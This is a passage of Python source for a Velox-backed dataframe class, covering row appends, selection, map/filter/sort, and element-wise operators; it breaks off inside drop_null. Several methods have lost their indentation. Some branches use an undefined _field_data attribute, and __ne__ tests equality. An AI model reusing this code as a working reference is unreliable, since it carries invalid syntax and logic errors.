    def _empty(device, dtype):
        """Create a mutable, zero-length DataFrameCpu with one empty column per field."""
        field_data = {f.name: Scope._EmptyColumn(f.dtype, device) for f in dtype.fields}
        return DataFrameCpu(device, dtype, field_data)
@staticmethod
def _fromlist(device, data: List, dtype):
# default (ineffincient) implementation
col = DataFrameCpu._empty(device, dtype)
for i in data:
col._append(i)
return col._finalize()
def _append_null(self):
if self._finialized:
raise AttributeError("It is already finialized.")
df = self.append([None])
self._data = df._data
def _append_value(self, value):
if self._finialized:
raise AttributeError("It is already finialized.")
df = self.append([value])
self._data = df._data
    def _finalize(self):
        """Freeze the frame against further appends and return self."""
        # NOTE(review): keeps the original "finialized" spelling because the
        # append paths check this exact attribute name.
        self._finialized = True
        return self
    def _fromdata(
        self, field_data: OrderedDict[str, IColumn], mask: Optional[Iterable[bool]]
    ):
        """Assemble a new struct column from named child columns plus an optional null mask."""
        dtype = dt.Struct(
            [dt.Field(n, c.dtype) for n, c in field_data.items()],
            nullable=self.dtype.nullable,
        )
        col = velox.Column(get_velox_type(dtype))
        for n, c in field_data.items():
            col.set_child(col.type().get_child_idx(n), c._data)
            col.set_length(len(c._data))
        if mask is not None:
            mask_list = list(mask)
            # The mask must cover every row (unless there are no columns at all).
            assert len(field_data) == 0 or len(mask_list) == len(col)
            for i in range(len(col)):
                if mask_list[i]:
                    col.set_null_at(i)
        return ColumnFromVelox.from_velox(self.device, dtype, col, True)
    def __len__(self):
        """Number of rows."""
        return len(self._data)
    @property
    def null_count(self):
        """Number of null (masked) rows."""
        return self._data.get_null_count()
def _getmask(self, i):
if i < 0:
i += len(self._data)
return self._data.is_null_at(i)
    def _getdata(self, i):
        """Return row *i* as a tuple of field values, or None when the row is null."""
        if i < 0:
            i += len(self._data)
        if not self._getmask(i):
            # Wrap each Velox child and pull out its i-th value.
            return tuple(
                ColumnFromVelox.from_velox(
                    self.device,
                    self.dtype.fields[j].dtype,
                    self._data.child_at(j),
                    True,
                )._get(i, None)
                for j in range(self._data.children_size())
            )
        else:
            return None
@staticmethod
def _valid_mask(ct):
return np.full((ct,), False, dtype=np.bool8)
    def append(self, values: Iterable[Union[None, dict, tuple]]):
        """Return a new frame with *values* appended, one row per element.

        Each element may be None (appends a fully-null row; requires a nullable
        dtype), a dict keyed by field name, or a tuple in field order. Rows are
        consumed recursively, one element per call.
        """
        it = iter(values)
        try:
            value = next(it)
            if value is None:
                if not self.dtype.nullable:
                    raise TypeError(
                        f"a tuple of type {self.dtype} is required, got None"
                    )
                else:
                    # Append a row of per-field Nones, then mark the row null.
                    df = self.append([{f.name: None for f in self.dtype.fields}])
                    df._data.set_null_at(len(df) - 1)
                    return df
            elif isinstance(value, dict):
                assert self._data.children_size() == len(value)
                res = {}
                for k, v in value.items():
                    idx = self._data.type().get_child_idx(k)
                    child = self._data.child_at(idx)
                    dtype = self.dtype.fields[idx].dtype
                    child_col = ColumnFromVelox.from_velox(
                        self.device, dtype, child, True
                    )
                    child_col = child_col.append([v])
                    res[k] = child_col
                # Rebuild the frame with the grown children, then recurse on the rest.
                new_data = self._fromdata(res, self._mask + [False])
                return new_data.append(it)
            elif isinstance(value, tuple):
                assert self._data.children_size() == len(value)
                # Tuples are converted to dicts using the field order.
                return self.append(
                    [{f.name: v for f, v in zip(self.dtype.fields, value)}]
                ).append(it)
        except StopIteration:
            return self
def _check_columns(self, columns: Iterable[str]):
valid_names = {f.name for f in self.dtype.fields}
for n in columns:
if n not in valid_names:
raise TypeError(f"column {n} not among existing dataframe columns")
    # implementing abstract methods ----------------------------------------------
    def _set_field_data(self, name: str, col: IColumn, empty_df: bool):
        """Replace (or install) column *name* with *col*, rebuilding the Velox row column."""
        if not empty_df and len(col) != len(self):
            raise TypeError("all columns/lists must have equal length")
        column_idx = self._dtype.get_index(name)
        new_delegate = velox.Column(get_velox_type(self._dtype))
        new_delegate.set_length(len(col._data))
        # Set columns for new_delegate: reuse the old children except at column_idx.
        for idx in range(len(self._dtype.fields)):
            if idx != column_idx:
                new_delegate.set_child(idx, self._data.child_at(idx))
            else:
                new_delegate.set_child(idx, col._data)
        self._data = new_delegate
# printing ----------------------------------------------------------------
def __str__(self):
return self.__repr__()
    def __repr__(self):
        """Render as a tabulated table followed by a dtype/count/null_count footer."""
        data = []
        for i in self:
            # Null rows render as a full row of the string "None".
            if i is None:
                data.append(["None"] * len(self.columns))
            else:
                assert len(i) == len(self.columns)
                data.append(list(i))
        tab = tabulate(
            data, headers=["index"] + self.columns, tablefmt="simple", showindex=True
        )
        typ = f"dtype: {self._dtype}, count: {len(self)}, null_count: {self.null_count}"
        return tab + dt.NL + typ
    # selectors -----------------------------------------------------------
    def _column_index(self, arg):
        """Positional index of field *arg* in the underlying Velox row type."""
        return self._data.type().get_child_idx(arg)
    def _gets(self, indices):
        """Select rows by an index collection."""
        # NOTE(review): self._field_data is never assigned in this class (other
        # methods go through self._data), and self._mask is a plain list that
        # does not support fancy indexing — this path looks stale and would
        # raise if exercised; confirm before relying on it.
        return self._fromdata(
            {n: c[indices] for n, c in self._field_data.items()}, self._mask[indices]
        )
    def _slice(self, start, stop, step):
        """Slice rows [start:stop:step], slicing every child column and the null mask."""
        mask = [self._mask[i] for i in list(range(len(self)))[start:stop:step]]
        return self._fromdata(
            {
                self.dtype.fields[i]
                .name: ColumnFromVelox.from_velox(
                    self.device,
                    self.dtype.fields[i].dtype,
                    self._data.child_at(i),
                    True,
                )
                ._slice(start, stop, step)
                for i in range(self._data.children_size())
            },
            mask,
        )
def get_column(self, column):
idx = self._data.type().get_child_idx(column)
return ColumnFromVelox.from_velox(
self.device,
self.dtype.fields[idx].dtype,
self._data.child_at(idx),
True,
)
def get_columns(self, columns):
# TODO: decide on nulls, here we assume all defined (mask = False) for new parent...
res = {}
for n in columns:
res[n] = self.get_column(n)
return self._fromdata(res, self._mask)
    def slice_columns(self, start, stop):
        """Project onto the contiguous column range [start, stop) by field name."""
        # TODO: decide on nulls, here we assume all defined (mask = False) for new parent...
        # None boundaries default to the first / one-past-last column.
        _start = 0 if start is None else self._column_index(start)
        _stop = len(self.columns) if stop is None else self._column_index(stop)
        res = {}
        for i in range(_start, _stop):
            m = self.columns[i]
            res[m] = ColumnFromVelox.from_velox(
                self.device,
                self.dtype.fields[i].dtype,
                self._data.child_at(i),
                True,
            )
        return self._fromdata(res, self._mask)
    # functools map/filter/reduce ---------------------------------------------
    @trace
    @expression
    def map(
        self,
        arg: Union[Dict, Callable],
        /,
        na_action: Literal["ignore", None] = None,
        dtype: Optional[dt.DType] = None,
        columns: Optional[List[str]] = None,
    ):
        """
        Maps rows according to input correspondence.
        dtype required if result type != item type.
        """
        # Without a column selection, defer to the generic IDataFrame.map.
        if columns is None:
            return super().map(arg, na_action, dtype)
        self._check_columns(columns)
        # Single-column case: map directly over that child column.
        if len(columns) == 1:
            idx = self._data.type().get_child_idx(columns[0])
            return ColumnFromVelox.from_velox(
                self.device,
                self.dtype.fields[idx].dtype,
                self._data.child_at(idx),
                True,
            ).map(arg, na_action, dtype)
        else:
            # Try to infer the result dtype from the callable's type hints.
            if not isinstance(arg, dict) and dtype is None:
                (dtype, _) = dt.infer_dype_from_callable_hint(arg)
            dtype = dtype or self._dtype
            def func(*x):
                # Dict args act as a lookup table keyed by the row tuple.
                return arg.get(tuple(*x), None) if isinstance(arg, dict) else arg(*x)
            cols = []
            for n in columns:
                idx = self._data.type().get_child_idx(n)
                cols.append(
                    ColumnFromVelox.from_velox(
                        self.device,
                        self.dtype.fields[idx].dtype,
                        self._data.child_at(idx),
                        True,
                    )
                )
            res = Scope.default._EmptyColumn(dtype)
            for i in range(len(self)):
                if self.is_valid_at(i):
                    res._append(func(*[col[i] for col in cols]))
                elif na_action is None:
                    res._append(func(None))
                else:
                    res._append(None)
            return res._finalize()
    @trace
    @expression
    def flatmap(
        self,
        arg: Union[Dict, Callable],
        na_action: Literal["ignore", None] = None,
        dtype: Optional[dt.DType] = None,
        columns: Optional[List[str]] = None,
    ):
        """
        Maps rows to list of rows according to input correspondence
        dtype required if result type != item type.
        """
        if columns is None:
            return super().flatmap(arg, na_action, dtype)
        self._check_columns(columns)
        # NOTE(review): the column-selected paths below read self._field_data and
        # call self.valid(i); neither exists on this class (cf. self._data /
        # self.is_valid_at used elsewhere) — these branches look stale; verify.
        if len(columns) == 1:
            return self._field_data[columns[0]].flatmap(
                arg,
                na_action,
                dtype,
            )
        else:
            def func(x):
                return arg.get(x, None) if isinstance(arg, dict) else arg(x)
            dtype_ = dtype if dtype is not None else self._dtype
            cols = [self._field_data[n] for n in columns]
            res = Scope._EmptyColumn(dtype_)
            for i in range(len(self)):
                if self.valid(i):
                    res._extend(func(*[col[i] for col in cols]))
                elif na_action is None:
                    res._extend(func(None))
                else:
                    res._append([])
            return res._finalize()
    @trace
    @expression
    def filter(
        self, predicate: Union[Callable, Iterable], columns: Optional[List[str]] = None
    ):
        """
        Select rows where predicate is True.
        Different from Pandas. Use keep for Pandas filter.
        Parameters
        ----------
        predicate - callable or iterable
            A predicate function or iterable of booleans the same
            length as the column. If an n-ary predicate, use the
            columns parameter to provide arguments.
        columns - list of string names, default None
            Which columns to invoke the filter with. If None, apply to
            all columns.
        See Also
        --------
        map, reduce, flatmap
        Examples
        --------
        >>> ta.Column([1,2,3,4]).filter([True, False, True, False]) == ta.Column([1,2,3,4]).filter(lambda x: x%2==1)
        0  1
        1  1
        dtype: boolean, length: 2, null_count: 0
        """
        if columns is None:
            return super().filter(predicate)
        self._check_columns(columns)
        if not isinstance(predicate, Iterable) and not callable(predicate):
            raise TypeError(
                "predicate must be a unary boolean predicate or iterable of booleans"
            )
        res = Scope._EmptyColumn(self._dtype)
        # Wrap the selected child columns so the predicate receives their values.
        cols = []
        for n in columns:
            idx = self._data.type().get_child_idx(n)
            cols.append(
                ColumnFromVelox.from_velox(
                    self.device,
                    self.dtype.fields[idx].dtype,
                    self._data.child_at(idx),
                    True,
                )
            )
        if callable(predicate):
            # n-ary predicate over the selected columns keeps the whole row.
            for i in range(len(self)):
                if predicate(*[col[i] for col in cols]):
                    res._append(self[i])
        elif isinstance(predicate, Iterable):
            for x, p in zip(self, predicate):
                if p:
                    res._append(x)
        else:
            pass
        return res._finalize()
    # sorting ----------------------------------------------------------------
    @trace
    @expression
    def sort(
        self,
        by: Optional[List[str]] = None,
        ascending=True,
        na_position: Literal["last", "first"] = "last",
    ):
        """Sort a column/a dataframe in ascending or descending order"""
        # Not allowing None in comparison might be too harsh...
        # Move all rows with None that in sort index to back...
        func = None
        if isinstance(by, list):
            xs = []
            for i in by:
                _ = self._data.type().get_child_idx(i)  # throws key error
                xs.append(self.columns.index(i))
            # Compare on the `by` columns first, then the remaining fields.
            reorder = xs + [j for j in range(len(self.dtype.fields)) if j not in xs]
            def func(tup):
                return tuple(tup[i] for i in reorder)
        res = Scope._EmptyColumn(self.dtype)
        # Null rows are not comparable; they are emitted as a block before or
        # after the sorted non-null rows depending on na_position.
        if na_position == "first":
            res._extend([None] * self.null_count)
        res._extend(
            sorted((i for i in self if i is not None), reverse=not ascending, key=func)
        )
        if na_position == "last":
            res._extend([None] * self.null_count)
        return res._finalize()
    @trace
    @expression
    def _nlargest(
        self,
        n=5,
        columns: Optional[List[str]] = None,
        keep: Literal["last", "first"] = "first",
    ):
        """Returns a new dataframe of the *n* largest elements."""
        # Todo add keep arg
        # `keep` is currently ignored: sort descending and take the first n rows.
        return self.sort(by=columns, ascending=False).head(n)
    @trace
    @expression
    def _nsmallest(
        self,
        n=5,
        columns: Optional[List[str]] = None,
        keep: Literal["last", "first"] = "first",
    ):
        """Returns a new dataframe of the *n* smallest elements."""
        # `keep` is currently ignored: sort ascending and take the first n rows.
        return self.sort(by=columns, ascending=True).head(n)
    # operators --------------------------------------------------------------
    @expression
    def __add__(self, other):
        """Element-wise `self + other`; *other* is a same-length frame or a scalar."""
        if isinstance(other, DataFrameCpu):
            assert len(self) == len(other)
            # Frame + frame: add the i-th child columns pairwise.
            return self._fromdata(
                {
                    self.dtype.fields[i].name: ColumnFromVelox.from_velox(
                        self.device,
                        self.dtype.fields[i].dtype,
                        self._data.child_at(i),
                        True,
                    )
                    + ColumnFromVelox.from_velox(
                        other.device,
                        other.dtype.fields[i].dtype,
                        other._data.child_at(i),
                        True,
                    )
                    for i in range(self._data.children_size())
                },
                self._mask,
            )
        else:
            # Frame + scalar: broadcast the scalar over every child column.
            return self._fromdata(
                {
                    self.dtype.fields[i].name: ColumnFromVelox.from_velox(
                        self.device,
                        self.dtype.fields[i].dtype,
                        self._data.child_at(i),
                        True,
                    )
                    + other
                    for i in range(self._data.children_size())
                },
                self._mask,
            )
    @expression
    def __radd__(self, other):
        """Element-wise `other + self` (reflected add)."""
        if isinstance(other, DataFrameCpu):
            # NOTE(review): self._field_data is never assigned in this class —
            # this frame+frame branch looks stale; confirm before relying on it.
            return self._fromdata(
                {n: other[n] + c for (n, c) in self._field_data.items()}
            )
        else:
            # Scalar + frame: broadcast the scalar over every child column.
            return self._fromdata(
                {
                    self.dtype.fields[i].name: other
                    + ColumnFromVelox.from_velox(
                        self.device,
                        self.dtype.fields[i].dtype,
                        self._data.child_at(i),
                        True,
                    )
                    for i in range(self._data.children_size())
                },
                self._mask,
            )
    @expression
    def __sub__(self, other):
        """Element-wise `self - other`; *other* is a same-length frame or a scalar."""
        if isinstance(other, DataFrameCpu):
            assert len(self) == len(other)
            return self._fromdata(
                {
                    self.dtype.fields[i].name: ColumnFromVelox.from_velox(
                        self.device,
                        self.dtype.fields[i].dtype,
                        self._data.child_at(i),
                        True,
                    )
                    - ColumnFromVelox.from_velox(
                        other.device,
                        other.dtype.fields[i].dtype,
                        other._data.child_at(i),
                        True,
                    )
                    for i in range(self._data.children_size())
                },
                self._mask,
            )
        else:
            return self._fromdata(
                {
                    self.dtype.fields[i].name: ColumnFromVelox.from_velox(
                        self.device,
                        self.dtype.fields[i].dtype,
                        self._data.child_at(i),
                        True,
                    )
                    - other
                    for i in range(self._data.children_size())
                },
                self._mask,
            )
    @expression
    def __rsub__(self, other):
        """Element-wise `other - self` (reflected subtraction)."""
        if isinstance(other, DataFrameCpu):
            assert len(self) == len(other)
            return self._fromdata(
                {
                    self.dtype.fields[i].name: ColumnFromVelox.from_velox(
                        other.device,
                        other.dtype.fields[i].dtype,
                        other._data.child_at(i),
                        True,
                    )
                    - ColumnFromVelox.from_velox(
                        self.device,
                        self.dtype.fields[i].dtype,
                        self._data.child_at(i),
                        True,
                    )
                    for i in range(self._data.children_size())
                },
                self._mask,
            )
        else:
            return self._fromdata(
                {
                    self.dtype.fields[i].name: other
                    - ColumnFromVelox.from_velox(
                        self.device,
                        self.dtype.fields[i].dtype,
                        self._data.child_at(i),
                        True,
                    )
                    for i in range(self._data.children_size())
                },
                self._mask,
            )
    @expression
    def __mul__(self, other):
        """Element-wise `self * other`; *other* is a same-length frame or a scalar."""
        if isinstance(other, DataFrameCpu):
            assert len(self) == len(other)
            return self._fromdata(
                {
                    self.dtype.fields[i].name: ColumnFromVelox.from_velox(
                        self.device,
                        self.dtype.fields[i].dtype,
                        self._data.child_at(i),
                        True,
                    )
                    * ColumnFromVelox.from_velox(
                        other.device,
                        other.dtype.fields[i].dtype,
                        other._data.child_at(i),
                        True,
                    )
                    for i in range(self._data.children_size())
                },
                self._mask,
            )
        else:
            return self._fromdata(
                {
                    self.dtype.fields[i].name: ColumnFromVelox.from_velox(
                        self.device,
                        self.dtype.fields[i].dtype,
                        self._data.child_at(i),
                        True,
                    )
                    * other
                    for i in range(self._data.children_size())
                },
                self._mask,
            )
    @expression
    def __rmul__(self, other):
        """Element-wise `other * self` (reflected multiplication)."""
        if isinstance(other, DataFrameCpu):
            assert len(self) == len(other)
            return self._fromdata(
                {
                    self.dtype.fields[i].name: ColumnFromVelox.from_velox(
                        other.device,
                        other.dtype.fields[i].dtype,
                        other._data.child_at(i),
                        True,
                    )
                    * ColumnFromVelox.from_velox(
                        self.device,
                        self.dtype.fields[i].dtype,
                        self._data.child_at(i),
                        True,
                    )
                    for i in range(self._data.children_size())
                },
                self._mask,
            )
        else:
            return self._fromdata(
                {
                    self.dtype.fields[i].name: other
                    * ColumnFromVelox.from_velox(
                        self.device,
                        self.dtype.fields[i].dtype,
                        self._data.child_at(i),
                        True,
                    )
                    for i in range(self._data.children_size())
                },
                self._mask,
            )
    @expression
    def __floordiv__(self, other):
        """Element-wise `self // other`; *other* is a same-length frame or a scalar."""
        if isinstance(other, DataFrameCpu):
            assert len(self) == len(other)
            return self._fromdata(
                {
                    self.dtype.fields[i].name: ColumnFromVelox.from_velox(
                        self.device,
                        self.dtype.fields[i].dtype,
                        self._data.child_at(i),
                        True,
                    )
                    // ColumnFromVelox.from_velox(
                        other.device,
                        other.dtype.fields[i].dtype,
                        other._data.child_at(i),
                        True,
                    )
                    for i in range(self._data.children_size())
                },
                self._mask,
            )
        else:
            return self._fromdata(
                {
                    self.dtype.fields[i].name: ColumnFromVelox.from_velox(
                        self.device,
                        self.dtype.fields[i].dtype,
                        self._data.child_at(i),
                        True,
                    )
                    // other
                    for i in range(self._data.children_size())
                },
                self._mask,
            )
    @expression
    def __rfloordiv__(self, other):
        """Reflected element-wise floor division: ``other // self``.

        Operand order is swapped relative to ``__floordiv__``; the null mask
        of ``self`` is carried over.
        """
        if isinstance(other, DataFrameCpu):
            assert len(self) == len(other)
            return self._fromdata(
                {
                    self.dtype.fields[i].name: ColumnFromVelox.from_velox(
                        other.device,
                        other.dtype.fields[i].dtype,
                        other._data.child_at(i),
                        True,
                    )
                    // ColumnFromVelox.from_velox(
                        self.device,
                        self.dtype.fields[i].dtype,
                        self._data.child_at(i),
                        True,
                    )
                    for i in range(self._data.children_size())
                },
                self._mask,
            )
        else:
            # Scalar case: scalar numerator divided by every column.
            return self._fromdata(
                {
                    self.dtype.fields[i].name: other
                    // ColumnFromVelox.from_velox(
                        self.device,
                        self.dtype.fields[i].dtype,
                        self._data.child_at(i),
                        True,
                    )
                    for i in range(self._data.children_size())
                },
                self._mask,
            )
    @expression
    def __truediv__(self, other):
        """Element-wise true division with another DataFrameCpu or a scalar.

        Columns are matched positionally; the null mask of ``self`` is
        carried over to the result.
        """
        if isinstance(other, DataFrameCpu):
            assert len(self) == len(other)
            return self._fromdata(
                {
                    self.dtype.fields[i].name: ColumnFromVelox.from_velox(
                        self.device,
                        self.dtype.fields[i].dtype,
                        self._data.child_at(i),
                        True,
                    )
                    / ColumnFromVelox.from_velox(
                        other.device,
                        other.dtype.fields[i].dtype,
                        other._data.child_at(i),
                        True,
                    )
                    for i in range(self._data.children_size())
                },
                self._mask,
            )
        else:
            # Scalar case: broadcast `other` as the divisor of every column.
            return self._fromdata(
                {
                    self.dtype.fields[i].name: ColumnFromVelox.from_velox(
                        self.device,
                        self.dtype.fields[i].dtype,
                        self._data.child_at(i),
                        True,
                    )
                    / other
                    for i in range(self._data.children_size())
                },
                self._mask,
            )
@expression
def __rtruediv__(self, other):
if isinstance(other, DataFrameCpu):
return self._fromdata(
{n: other[n] / c for (n, c) in self._field_data.items()}
)
else:
return self._fromdata({n: other / c for (n, c) in self._field_data.items()})
    @expression
    def __mod__(self, other):
        """Element-wise modulo with another DataFrameCpu or a scalar."""
        if isinstance(other, DataFrameCpu):
            # DataFrame case: match columns by name via _field_data.
            return self._fromdata(
                {n: c % other[n] for (n, c) in self._field_data.items()}
            )
        else:
            # Scalar case: broadcast `other` across every column; the null
            # mask of self is carried over.
            return self._fromdata(
                {
                    self.dtype.fields[i].name: ColumnFromVelox.from_velox(
                        self.device,
                        self.dtype.fields[i].dtype,
                        self._data.child_at(i),
                        True,
                    )
                    % other
                    for i in range(self._data.children_size())
                },
                self._mask,
            )
@expression
def __rmod__(self, other):
if isinstance(other, DataFrameCpu):
return self._fromdata(
{n: other[n] % c for (n, c) in self._field_data.items()}
)
else:
return self._fromdata({n: other % c for (n, c) in self._field_data.items()})
    @expression
    def __pow__(self, other):
        """Element-wise exponentiation with another DataFrameCpu or a scalar.

        Columns are matched positionally; the null mask of ``self`` is
        carried over to the result.
        """
        if isinstance(other, DataFrameCpu):
            assert len(self) == len(other)
            return self._fromdata(
                {
                    self.dtype.fields[i].name: ColumnFromVelox.from_velox(
                        self.device,
                        self.dtype.fields[i].dtype,
                        self._data.child_at(i),
                        True,
                    )
                    ** ColumnFromVelox.from_velox(
                        other.device,
                        other.dtype.fields[i].dtype,
                        other._data.child_at(i),
                        True,
                    )
                    for i in range(self._data.children_size())
                },
                self._mask,
            )
        else:
            # Scalar case: every column raised to the scalar power.
            return self._fromdata(
                {
                    self.dtype.fields[i].name: ColumnFromVelox.from_velox(
                        self.device,
                        self.dtype.fields[i].dtype,
                        self._data.child_at(i),
                        True,
                    )
                    ** other
                    for i in range(self._data.children_size())
                },
                self._mask,
            )
    @expression
    def __rpow__(self, other):
        """Reflected element-wise exponentiation: ``other ** self``.

        Operand order is swapped relative to ``__pow__``; the null mask of
        ``self`` is carried over.
        """
        if isinstance(other, DataFrameCpu):
            assert len(self) == len(other)
            return self._fromdata(
                {
                    self.dtype.fields[i].name: ColumnFromVelox.from_velox(
                        other.device,
                        other.dtype.fields[i].dtype,
                        other._data.child_at(i),
                        True,
                    )
                    ** ColumnFromVelox.from_velox(
                        self.device,
                        self.dtype.fields[i].dtype,
                        self._data.child_at(i),
                        True,
                    )
                    for i in range(self._data.children_size())
                },
                self._mask,
            )
        else:
            # Scalar case: scalar base raised to every column.
            return self._fromdata(
                {
                    self.dtype.fields[i].name: other
                    ** ColumnFromVelox.from_velox(
                        self.device,
                        self.dtype.fields[i].dtype,
                        self._data.child_at(i),
                        True,
                    )
                    for i in range(self._data.children_size())
                },
                self._mask,
            )
    @expression
    def __eq__(self, other):
        """Element-wise equality with another DataFrameCpu or a scalar.

        Returns a dataframe of per-column comparison results (not a bool).
        NOTE(review): defining __eq__ normally disables hashing unless
        __hash__ is (re)defined elsewhere in the class — confirm.
        """
        if isinstance(other, DataFrameCpu):
            assert len(self) == len(other)
            return self._fromdata(
                {
                    self.dtype.fields[i].name: ColumnFromVelox.from_velox(
                        self.device,
                        self.dtype.fields[i].dtype,
                        self._data.child_at(i),
                        True,
                    )
                    == ColumnFromVelox.from_velox(
                        other.device,
                        other.dtype.fields[i].dtype,
                        other._data.child_at(i),
                        True,
                    )
                    for i in range(self._data.children_size())
                },
                self._mask,
            )
        else:
            # Scalar case: compare every column against `other`.
            return self._fromdata(
                {
                    self.dtype.fields[i].name: ColumnFromVelox.from_velox(
                        self.device,
                        self.dtype.fields[i].dtype,
                        self._data.child_at(i),
                        True,
                    )
                    == other
                    for i in range(self._data.children_size())
                },
                self._mask,
            )
@expression
def __ne__(self, other):
if isinstance(other, DataFrameCpu):
return self._fromdata(
{n: c == other[n] for (n, c) in self._field_data.items()}
)
else:
return self._fromdata(
{n: c == other for (n, c) in self._field_data.items()}
)
    @expression
    def __lt__(self, other):
        """Element-wise ``<`` with another DataFrameCpu or a scalar.

        Columns are matched positionally; the null mask of ``self`` is
        carried over to the result.
        """
        if isinstance(other, DataFrameCpu):
            assert len(self) == len(other)
            return self._fromdata(
                {
                    self.dtype.fields[i].name: ColumnFromVelox.from_velox(
                        self.device,
                        self.dtype.fields[i].dtype,
                        self._data.child_at(i),
                        True,
                    )
                    < ColumnFromVelox.from_velox(
                        other.device,
                        other.dtype.fields[i].dtype,
                        other._data.child_at(i),
                        True,
                    )
                    for i in range(self._data.children_size())
                },
                self._mask,
            )
        else:
            # Scalar case: compare every column against `other`.
            return self._fromdata(
                {
                    self.dtype.fields[i].name: ColumnFromVelox.from_velox(
                        self.device,
                        self.dtype.fields[i].dtype,
                        self._data.child_at(i),
                        True,
                    )
                    < other
                    for i in range(self._data.children_size())
                },
                self._mask,
            )
    @expression
    def __gt__(self, other):
        """Element-wise ``>`` with another DataFrameCpu or a scalar.

        Columns are matched positionally; the null mask of ``self`` is
        carried over to the result.
        """
        if isinstance(other, DataFrameCpu):
            assert len(self) == len(other)
            return self._fromdata(
                {
                    self.dtype.fields[i].name: ColumnFromVelox.from_velox(
                        self.device,
                        self.dtype.fields[i].dtype,
                        self._data.child_at(i),
                        True,
                    )
                    > ColumnFromVelox.from_velox(
                        other.device,
                        other.dtype.fields[i].dtype,
                        other._data.child_at(i),
                        True,
                    )
                    for i in range(self._data.children_size())
                },
                self._mask,
            )
        else:
            # Scalar case: compare every column against `other`.
            return self._fromdata(
                {
                    self.dtype.fields[i].name: ColumnFromVelox.from_velox(
                        self.device,
                        self.dtype.fields[i].dtype,
                        self._data.child_at(i),
                        True,
                    )
                    > other
                    for i in range(self._data.children_size())
                },
                self._mask,
            )
    def __le__(self, other):
        """Element-wise ``<=`` with another DataFrameCpu or a scalar."""
        # NOTE(review): unlike __lt__/__gt__ this method carries no
        # @trace/@expression decorators and no len() assertion for the
        # DataFrameCpu case — confirm whether that is intentional.
        if isinstance(other, DataFrameCpu):
            return self._fromdata(
                {n: c <= other[n] for (n, c) in self._field_data.items()}
            )
        else:
            # Scalar case: compare every column against `other`.
            return self._fromdata(
                {
                    self.dtype.fields[i].name: ColumnFromVelox.from_velox(
                        self.device,
                        self.dtype.fields[i].dtype,
                        self._data.child_at(i),
                        True,
                    )
                    <= other
                    for i in range(self._data.children_size())
                },
                self._mask,
            )
    def __ge__(self, other):
        """Element-wise ``>=`` with another DataFrameCpu or a scalar."""
        if isinstance(other, DataFrameCpu):
            assert len(self) == len(other)
            # Columns are matched positionally; self's null mask is kept.
            return self._fromdata(
                {
                    self.dtype.fields[i].name: ColumnFromVelox.from_velox(
                        self.device,
                        self.dtype.fields[i].dtype,
                        self._data.child_at(i),
                        True,
                    )
                    >= ColumnFromVelox.from_velox(
                        other.device,
                        other.dtype.fields[i].dtype,
                        other._data.child_at(i),
                        True,
                    )
                    for i in range(self._data.children_size())
                },
                self._mask,
            )
        else:
            # Scalar case: compare every column against `other`.
            return self._fromdata(
                {n: c >= other for (n, c) in self._field_data.items()}
            )
    def __or__(self, other):
        """Element-wise OR (``self | other``) with a DataFrameCpu or scalar."""
        if isinstance(other, DataFrameCpu):
            # DataFrame case: combine like-named columns.
            return self._fromdata(
                {n: c | other[n] for (n, c) in self._field_data.items()}
            )
        else:
            # Scalar case: broadcast `other` across every column.
            return self._fromdata(
                {
                    self.dtype.fields[i].name: ColumnFromVelox.from_velox(
                        self.device,
                        self.dtype.fields[i].dtype,
                        self._data.child_at(i),
                        True,
                    )
                    | other
                    for i in range(self._data.children_size())
                },
                self._mask,
            )
def __ror__(self, other):
if isinstance(other, DataFrameCpu):
return self._fromdata(
{n: other[n] | c for (n, c) in self._field_data.items()}
)
else:
return self._fromdata({n: other | c for (n, c) in self._field_data.items()})
def __and__(self, other):
if isinstance(other, DataFrameCpu):
return self._fromdata(
{n: c & other[n] for (n, c) in self._field_data.items()}
)
else:
return self._fromdata({n: c & other for (n, c) in self._field_data.items()})
def __rand__(self, other):
if isinstance(other, DataFrameCpu):
return self._fromdata(
{n: other[n] & c for (n, c) in self._field_data.items()}
)
else:
return self._fromdata({n: other & c for (n, c) in self._field_data.items()})
def __invert__(self):
return self._fromdata({n: ~c for (n, c) in self._field_data.items()})
    def __neg__(self):
        """Element-wise negation (``-df``); self's null mask is kept."""
        return self._fromdata(
            {
                self.dtype.fields[i].name: -ColumnFromVelox.from_velox(
                    self.device,
                    self.dtype.fields[i].dtype,
                    self._data.child_at(i),
                    True,
                )
                for i in range(self._data.children_size())
            },
            self._mask,
        )
    def __pos__(self):
        """Unary plus (``+df``): rebuilds the dataframe from its children."""
        return self._fromdata(
            {
                self.dtype.fields[i].name: ColumnFromVelox.from_velox(
                    self.device,
                    self.dtype.fields[i].dtype,
                    self._data.child_at(i),
                    True,
                )
                for i in range(self._data.children_size())
            },
            self._mask,
        )
# isin ---------------------------------------------------------------
@trace
@expression
def isin(self, values: Union[list, dict, IColumn]):
"""Check whether values are contained in data."""
if isinstance(values, list):
return self._fromdata(
{
self.dtype.fields[i]
.name: ColumnFromVelox.from_velox(
self.device,
self.dtype.fields[i].dtype,
self._data.child_at(i),
True,
)
.isin(values)
for i in range(self._data.children_size())
},
self._mask,
)
if isinstance(values, dict):
self._check_columns(values.keys())
return self._fromdata(
{n: c.isin(values[n]) for n, c in self._field_data.items()}
)
if isinstance(values, IDataFrame):
self._check_columns(values.columns)
return self._fromdata(
{n: c.isin(values=list(values[n])) for n, c in self._field_data.items()}
)
else:
raise ValueError(
f"isin undefined for values of type {type(self).__name__}."
)
# data cleaning -----------------------------------------------------------
    @trace
    @expression
    def fill_null(self, fill_value: Union[dt.ScalarTypes, Dict, Literal[None]]):
        """Replace nulls in every column with `fill_value`.

        A `fill_value` of None is a no-op (self is returned unchanged).
        Only scalar fill values are supported; other types raise TypeError.
        """
        if fill_value is None:
            return self
        if isinstance(fill_value, IColumn._scalar_types):
            # Delegate per child column; self's null mask is kept.
            return self._fromdata(
                {
                    self.dtype.fields[i]
                    .name: ColumnFromVelox.from_velox(
                        self.device,
                        self.dtype.fields[i].dtype,
                        self._data.child_at(i),
                        True,
                    )
                    .fill_null(fill_value)
                    for i in range(self._data.children_size())
                },
                self._mask,
            )
        else:
            # NOTE(review): the signature admits Dict but no dict branch is
            # implemented — dicts fall through to this error.
            raise TypeError(f"fill_null with {type(fill_value)} is not supported")
    @trace
    @expression
    def drop_null(self, how: Literal["any", "all"] = "any"):
        """Return a dataframe with rows removed where the row has any or all nulls."""
        # TODO only flat columns supported...
        assert self._dtype is not None
        # Rebuild row-by-row into a non-nullable variant of the same struct type.
        res = Scope._EmptyColumn(self._dtype.constructor(nullable=False))
        if how == "any":
            for i in self:
                if not self._has_any_null(i):
                    res._append(i)
        elif how == "all":
            for i in self:
